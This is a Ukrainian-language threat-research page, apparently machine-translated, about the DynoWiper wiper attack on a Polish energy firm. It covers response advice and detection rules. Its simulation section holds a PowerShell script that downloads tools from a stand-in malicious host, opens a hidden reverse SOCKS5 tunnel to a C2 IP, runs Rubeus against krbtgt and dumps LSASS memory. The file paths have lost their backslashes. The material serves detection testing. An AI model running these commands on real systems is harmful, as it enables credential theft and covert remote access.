SOC Prime Bias: Критичний

04 Feb 2026 15:19 UTC

Оновлення дослідження ESET DynoWiper: Технічний аналіз та атрибуція

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Стежити
Оновлення дослідження ESET DynoWiper: Технічний аналіз та атрибуція
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Короткий огляд

DynoWiper — це деструктивний вайпер, використаний проти організації енергетичного сектору в Польщі, що вплинуло на кілька кінцевих точок в операціях. Виконувані файли були розміщені у спільній мережевій локації та запускалися безпосередньо з цієї локації. ESET приписує цю активність Sandworm з середньою впевненістю. Після виконання, зловмисне програмне забезпечення пошкоджує цільові файли випадковими байтами та ініціює примусовий перезавантаження для завершення впливу.

Розслідування

ESET виявила три зразки — schtask.exe, schtask2.exe і _update.exe, розміщені у C:inetpubpub. Вбудовані шляхи PDB вказують на те, що бінарні файли були скомпільовані у середовищі Vagrant. Зворотне проектування показало трьохетапну рутину витирання, з двома варіантами, що вставляли п’ятисекундну паузу між фазами. Артефакти після компрометації також включали інструмент Kerberos Rubeus і rsocx SOCKS5 проксі всередині мережі жертви.

Зменшення

ESET PROTECT на системах жертви заблокував усі три варіанти, обмежуючи шкоду. Зменште рівень ризику, запобігаючи створенню невиданих запланованих завдань і моніторингу несподіваних записів у спільні каталоги. Додайте список дозволених додатків і забороніть виконання з мережевих ресурсів, де це можливо.

Відповідь

Ідентифікуйте та ізолюйте хости, що запускають schtask.exe, schtask2.exe або *_update.exe з поділу. Збережіть нестійкі докази, перевірте заплановані завдання та сліди розгортання PowerShell, та усуньте інструменти, такі як Rubeus та rsocx. Завершіть повну судово-медичну експертизу і відновлюйте дані із перевірених чистих резервних копій.

Потік атаки

Виявлення

Можливе самоусунення шкідливого ПЗ або приховування Stderr (через командний рядок)

Команда SOC Prime
03 лютого 2026

Вимкнення використовується для примусового зупинку або перезавантаження системи (через командний рядок)

Команда SOC Prime
03 лютого 2026

IOC (HashSha1) для виявлення: Оновлення дослідження ESET DynoWiper: Технічний аналіз і атрибуція

Правила SOC Prime AI
03 лютого 2026

IOC (SourceIP) для виявлення: Оновлення дослідження ESET DynoWiper: Технічний аналіз і атрибуція

Правила SOC Prime AI
03 лютого 2026

IOC (DestinationIP) для виявлення: Оновлення дослідження ESET DynoWiper: Технічний аналіз і атрибуція

Правила SOC Prime AI
03 лютого 2026

Виявлення розгортання DynoWiper через виконання запланованого завдання [Подія файлу Windows]

Правила SOC Prime AI
03 лютого 2026

Виявлення шкідливих інструментів і дампу пам’яті LSASS [Створення процесу Windows]

Правила SOC Prime AI
03 лютого 2026

Виконання симуляції

Передумова: Телеметрія і перевірка базової лінії повинні були пройти.

Підстави: Цей розділ детально описує точне виконання техніки супротивника (TTP), яка розроблена для запуску правила виявлення. Команди та наратив МАЮТЬ безпосередньо відображати ідентифіковані TTP та мають на меті генерувати саме ту телеметрію, яка очікується логікою виявлення. Абстрактні або нерелевантні приклади призведуть до неправильної діагностики.

  • Розповідь про атаку та команди:

    1. Встановити зворотний проксі SOCKS5 використовуючи rsocx.exe. Супротивник завантажує бінарний файл з зовнішнього сервера, розміщує його у %TEMP%, і запускає його з -r 31.172.71.5:8008 аргументом для створення зворотного каналу до хоста C2.
    2. Здійснити зловживання квитками Kerberos за допомогою rubeus.exe. Інструмент виконується для запиту квитка надання квитків (TGT) Kerberos для облікового запису адміністратора домену та згодом фальшування службового квитка (s4u2self).
    3. Вивантаження пам’яті LSASS використовуючи procdump.exe (загальна альтернатива Диспетчеру завдань) для захоплення матеріалу облікових даних. Sysmon записує подію доступу до процесу, де процес атакувальника procdump.exe доступа до lsass.exe з 0x1010 дозволеною маскою доступу (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION).
  • Сценарій регресійного тестування:

    # -------------------------------------------------------------
    # Сценарій симуляції – запускає правило Sigma для rsocx, rubeus,
    # та дамп LSASS. Запустіть з привілеями адміністратора.
    # -------------------------------------------------------------
    
    # 1. Розгорніть rsocx.exe (зворотний проксі SOCKS5)
    $rsocxPath = "$env:TEMPrsocx.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rsocx.exe" -OutFile $rsocxPath
    Start-Process -FilePath $rsocxPath -ArgumentList "-r 31.172.71.5:8008" -WindowStyle Hidden
    
    # 2. Розгорніть rubeus.exe (зловживання Kerberos)
    $rubeusPath = "$env:TEMPrubeus.exe"
    Invoke-WebRequest -Uri "http://malicious.example.com/rubeus.exe" -OutFile $rubeusPath
    Start-Process -FilePath $rubeusPath -ArgumentList "dump /service:krbtgt" -WindowStyle Hidden
    
    # 3. Вивантажте LSASS використовуючи procdump (вимагає Sysinternals)
    $procdumpPath = "$env:TEMPprocdump.exe"
    Invoke-WebRequest -Uri "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMPprocdump.zip"
    Expand-Archive -Path "$env:TEMPprocdump.zip" -DestinationPath $env:TEMP -Force
    $procdumpExe = Get-ChildItem "$env:TEMP" -Recurse -Filter "procdump.exe" | Select-Object -First 1
    if ($procdumpExe) {
        Copy-Item $procdumpExe.FullName $procdumpPath -Force
        Start-Process -FilePath $procdumpPath -ArgumentList "-ma lsass.exe $env:TEMPlsass.dmp" -Wait
    }
    
    Write-Host "Симуляція завершена. Перевірте SIEM на наявність оповіщень."
  • Команди очищення:

    # Завершення всіх залишкових шкідливих процесів
    Get-Process -Name "rsocx","rubeus","procdump" -ErrorAction SilentlyContinue | Stop-Process -Force
    
    # Видалення бінарних файлів та файлів дампу
    Remove-Item -Path "$env:TEMPrsocx.exe","$env:TEMPrubeus.exe","$env:TEMPprocdump.exe","$env:TEMPlsass.dmp" -Force -ErrorAction SilentlyContinue
    
    # Необов'язково видалити тимчасові каталоги завантаження
    Remove-Item -Path "$env:TEMPProcdump.zip","$env:TEMPprocdump" -Recurse -Force -ErrorAction SilentlyContinue
    
    Write-Host "Очищення завершено."